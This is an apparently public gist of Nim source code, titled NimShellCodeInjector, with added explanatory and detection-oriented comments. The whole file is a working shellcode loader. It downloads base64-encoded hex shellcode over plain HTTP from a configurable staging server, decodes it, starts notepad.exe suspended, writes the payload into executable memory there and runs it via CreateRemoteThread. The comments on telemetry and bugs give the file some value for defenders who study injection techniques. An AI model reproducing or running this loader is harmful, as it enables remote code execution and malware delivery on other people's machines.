@mttaggart
Created December 21, 2021 04:07
NimShellCodeInjector
# With special thanks to byt3bl33d3r for Offensive Nim!
import winim/lean
import osproc
import base64
import sequtils
import strutils
import strformat
import httpclient
# Staging configuration. The binary carries no payload of its own: at run
# time it requests `scFile` from http://scAddr:scPort (see the GET further
# down), decodes the text it receives and injects the result into a freshly
# started `injectProcess`.
let scPort = 8000                  # TCP port of the HTTP staging server
let scAddr = "0.0.0.0"             # host part of the staging URL
let scFile = "note.txt"            # path requested from the staging server
let injectProcess = "notepad.exe"  # process that is started and injected into
let b64Iterations = 1              # number of base64 layers around the payload text
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
  ## Starts `injectProcess` suspended, copies `shellcode` into an RWX region
  ## of that process and starts a remote thread at the region's base.
  ## Returns nothing and checks no API result: a NULL `rPtr`, a failed write
  ## or a failed thread creation is not detected in this proc.
  ##
  ## Detection note: this is the textbook
  ## OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READ_WRITE) ->
  ## WriteProcessMemory -> CreateRemoteThread chain, i.e. exactly the
  ## cross-process RWX allocation and remote-thread-creation telemetry
  ## (Sysmon event 8, EDR kernel callbacks) that defenders alert on.
  let tProcess = startProcess(injectProcess)
  # No matching resume() appears on this page: the process's own thread stays
  # suspended while the remote thread created below executes.
  tProcess.suspend()
  # Releases osproc's handles when this proc returns; not a terminate.
  defer: tProcess.close()
  let pHandle = OpenProcess(
    PROCESS_ALL_ACCESS,               # full rights requested on the new process
    false,                            # handle not inheritable
    cast[DWORD](tProcess.processID)
  )
  defer: CloseHandle(pHandle)
  # Allocation lives in the target's address space.
  let rPtr = VirtualAllocEx(
    pHandle,
    NULL,                             # kernel chooses the base address
    cast[SIZE_T](shellcode.len),      # element count == byte count only for 1-byte T
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE           # RWX: a strong memory-scan indicator
  )
  var bytesWritten: SIZE_T            # filled by the call, never read afterwards
  let wSuccess = WriteProcessMemory(
    pHandle,
    rPtr,                             # used without a NULL check
    unsafeAddr shellcode,             # raw pointer to the array's first element
    cast[SIZE_T](shellcode.len),
    addr bytesWritten
  )
  # `wSuccess` is stored but never consulted.
  let tHandle = CreateRemoteThread(
    pHandle,
    NULL,                             # default security attributes
    0,                                # default stack size
    cast[LPTHREAD_START_ROUTINE](rPtr),  # entry = start of the copied buffer
    NULL,                             # no thread parameter
    0,                                # creation flags: runs immediately
    NULL                              # thread id not requested
  )
  # Defers unwind LIFO: thread handle, then process handle, then tProcess.close().
  defer: CloseHandle(tHandle)
proc iterateDecode(sc: string, iterations: int): string =
  ## Strips `iterations` layers of base64 from `sc` and returns the
  ## innermost text. With `iterations <= 0` the input comes back unchanged.
  ## The final text is also written to stdout (debug output kept as-is).
  var decoded = sc
  for _ in 0..<iterations:
    decoded = base64.decode(decoded)
  echo decoded
  decoded
# --- Loader stage -----------------------------------------------------------
# Nothing executable is embedded in the binary: the payload text is pulled
# over plain HTTP from the staging server configured above, so the GET to
# http://<scAddr>:<scPort>/<scFile> is the network artifact of a run.
var client = newHttpClient()
var sc: string = client.get(fmt"http://{scAddr}:{scPort}/{scFile}").body
# Peel the base64 layers, then turn the comma-separated hex tokens
# (forms accepted by parseHexInt, e.g. "0x41" or "41") into a seq[int].
var sc_seq = iterateDecode(sc, b64Iterations)
  .split(",")
  .map(proc (h: string): string = strip(h))   # tolerate spaces around tokens
  .map(parseHexInt)
# Change this based on shellcode size
# The buffer length is a hard-coded constant and is not derived from
# `sc_seq.len`; the two must be kept in sync by hand.
var shellcode: array[890, byte]
# Shellcode size - 1
# Copies exactly 890 values: a shorter `sc_seq` raises IndexDefect, and a
# value above 255 raises RangeDefect while range checks are enabled.
for s in 0..889:
  shellcode[s] = byte sc_seq[s]
when isMainModule:
  injectCreateRemoteThread(shellcode)